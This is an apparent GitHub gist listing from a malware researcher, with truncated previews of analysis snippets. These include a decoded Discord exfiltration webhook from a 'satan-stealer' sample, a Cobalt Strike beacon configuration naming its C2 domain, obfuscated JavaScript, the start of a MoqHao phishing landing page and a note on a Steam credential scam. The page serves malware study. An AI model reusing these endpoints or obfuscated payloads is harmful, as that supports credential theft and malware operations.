Skip to content

Instantly share code, notes, and snippets.

View morimolymoly's full-sized avatar

mmmly morimolymoly

View GitHub Profile
@morimolymoly
morimolymoly / ia32_lstar.c
Created September 24, 2018 16:14
#include <linux/module.h>
static inline uint64_t exec_rdmsr(uint64_t msr)
{
uint32_t low, high;
asm volatile (
"rdmsr"
: "=a"(low), "=d"(high)
: "c"(msr)
);
@morimolymoly
morimolymoly / satan-stealer.py
Created March 23, 2023 20:43
import base64, codecs
magic = 'bXlob29rID0gImh0dHBzOi8vZGlzY29yZC5jb20vYXBp'
love = 'Y3qyLzuio2gmYmRjAwL0AwN2BGLmAwRjAQLjAmpio2Wn' # /webhooks/1066460696361046077/obZ
god = 'aVhOWmxNVmZONm9yMUl6M0ZuUlZiQmdsYV9pN0picndI'
destiny = 'JyEVEaDgZwu4F3x1AScOqJ9YIHMwqmMDHaMgrKSsrHbv'
joy = 'rot13' # rot13
trust = 'bXlob29rID0gImh0dHBzOi8vZGlzY29yZC5jb20vYXBp' + 'L3dlYmhvb2tzLzEwNjY0NjA2OTYzNjEwNDYwNzcvb2Ja' + 'aVhOWmxNVmZONm9yMUl6M0ZuUlZiQmdsYV9pN0picndI' + 'WlRIRnQtMjh4S3k1NFpBdW9LVUZjdzZQUnZteXFfeUoi'
print(base64.b64decode(trust)) # myhook = "https://discord.com/api/webhooks/1066460696361046077/obZiXNZlMVfN6or1Iz3FnRVbBgla_i7JbrwHZTHFt-28xKy54ZAuoKUFcw6PRvmyq_yJ"'
@morimolymoly
morimolymoly / zip_ext.yara
Created December 24, 2022 01:36 — forked from usualsuspect/zip_ext.yara
YARA rule to match zips containing specific file extensions
rule zip_with_ext
{
meta:
author = "@jaydinbas"
description = "Only match zip files containing desired file extensions"
strings:
$file_sig = "PK\x03\x04" //zip header sig
$entry_sig = "PK\x01\x02" //ZIPDIRENTRY sig
@morimolymoly
morimolymoly / cs
Created December 16, 2022 12:20
beacon-dump 9d2507cf867f22e1d967fcbc0f429a3dd5334ecb8561febff6813c4476c59534
SETTING_PROTOCOL = 8
SETTING_PORT = 443
SETTING_SLEEPTIME = 730
SETTING_MAXGET = 1048620
SETTING_JITTER = 0
SETTING_PUBKEY = 'd2c4ba9c2c526d3ec6772cb3d4edae802433c144128cef33109edcc1d234943c'
SETTING_DOMAINS = 'dqfkmwvib0lbb.cloudfront.net,/access/'
SETTING_DOMAIN_STRATEGY = 0
SETTING_DOMAIN_STRATEGY_SECONDS = 4294967295
@morimolymoly
morimolymoly / obuss_sakura.js
Created August 2, 2022 11:00
(function(_0xa33088, _0x3bdf6a) {
var _0x4c435d = _0xa33088();
function _0x3dcf6b(_0x55381d, _0x480e91, _0x21d320, _0x1c7a60, _0x2337d4) {
return _0x2a8d(_0x1c7a60 - 0x150, _0x55381d);
}
function _0x2815aa(_0x6e53a0, _0x5b9aeb, _0x302deb, _0x4a9908, _0x36c62f) {
return _0x2a8d(_0x36c62f - 0x16c, _0x302deb);
}
@morimolymoly
morimolymoly / ghidra_cfg.py
Created July 22, 2022 03:33
from ghidra.program.model.block import BasicBlockModel
from ghidra.util.task import ConsoleTaskMonitor
fm = currentProgram.getFunctionManager()
functions = fm.getFunctions(True)
blockModel = BasicBlockModel(currentProgram)
monitor = ConsoleTaskMonitor()
for func in functions:
@morimolymoly
morimolymoly / moqhao-ios-landing-page.html
Created April 14, 2022 23:55
<html>
<head>
<title></title>
</head>
<body>
<div>
<script>
var arr = "42931,42942,42935,42912,42918,43002,42992,42899,42882,42882,42866,42881,42918,42941,42912,42935,38768,38777,38772,38689,38682,38845,64603,63162,53922,63978,38814,38800,38745,38844,38837,38867,63071,63860,38719,38754,38774,38689,38789,38836,38813,38834,38791,38806,38864,42992,43003,42985,42968,42994,42994,42994,42994,42994,42994,42994,42994,42942,42941,42929,42931,42918,42939,42941,42940,43004,42912,42935,42914,42942,42931,42929,42935,43002,42997,42938,42918,42918,42914,42984,43005,43005,42923,42912,42934,42942,42931,42935,42928,42928,42915,42918,43004,42934,42919,42929,42937,42934,42940,42913,43004,42941,42912,42933,42997,43003,42985,42962".split(',').map(function (a) { return a | 0 });
@morimolymoly
morimolymoly / dmesg fastboot Pixel3a
Created February 27, 2022 10:36
fastboot oem dmesg
(bootloader) UEFI Start [ 725] SEC
(bootloader) ASLR : On
(bootloader) DEP : Off
(bootloader) Timer Delta : +0 mS
(bootloader) RAM Entry 0 : Base 0x0000000080000000 Size 0x0000000080000
(bootloader) 000
(bootloader) RAM Entry 1 : Base 0x0000000100000000 Size 0x000000007E2C0
(bootloader) 000
(bootloader) UEFI Ver : 5.0.210923.BOOT.XF.2.1-00134-SDM710LZB-2
@morimolymoly
morimolymoly / fk.py
Created January 31, 2022 05:57
import capstone
from capstone import *
cs = Cs(CS_ARCH_MIPS, CS_MODE_32 + CS_MODE_BIG_ENDIAN)
cs.detail = True
print(f"Capstone version: {capstone.__version__}")
# 0c1001f5
call_encoding = b'\x0c\x10\x01\xf5' # jal 4007d4 <funcc>
@morimolymoly
morimolymoly / scams.md
Last active December 2, 2021 05:43

Scam Details

steal account credentials

Scammer(https://steamcommunity.com/profiles/76561198378304894) send messages to victims for inviting to exchange in-game items. He let you to connect to legit trading website. (e.g. csmoney, bitskins) And also, he introduce fake website(https://suffinfo.com/) to check item's price.

fakewebsite do picture-in-picture attack. It steals victim's account ID and password and also 2FA code.

Login window is totally fake(with picture-in-picture attack, it seems totally legit)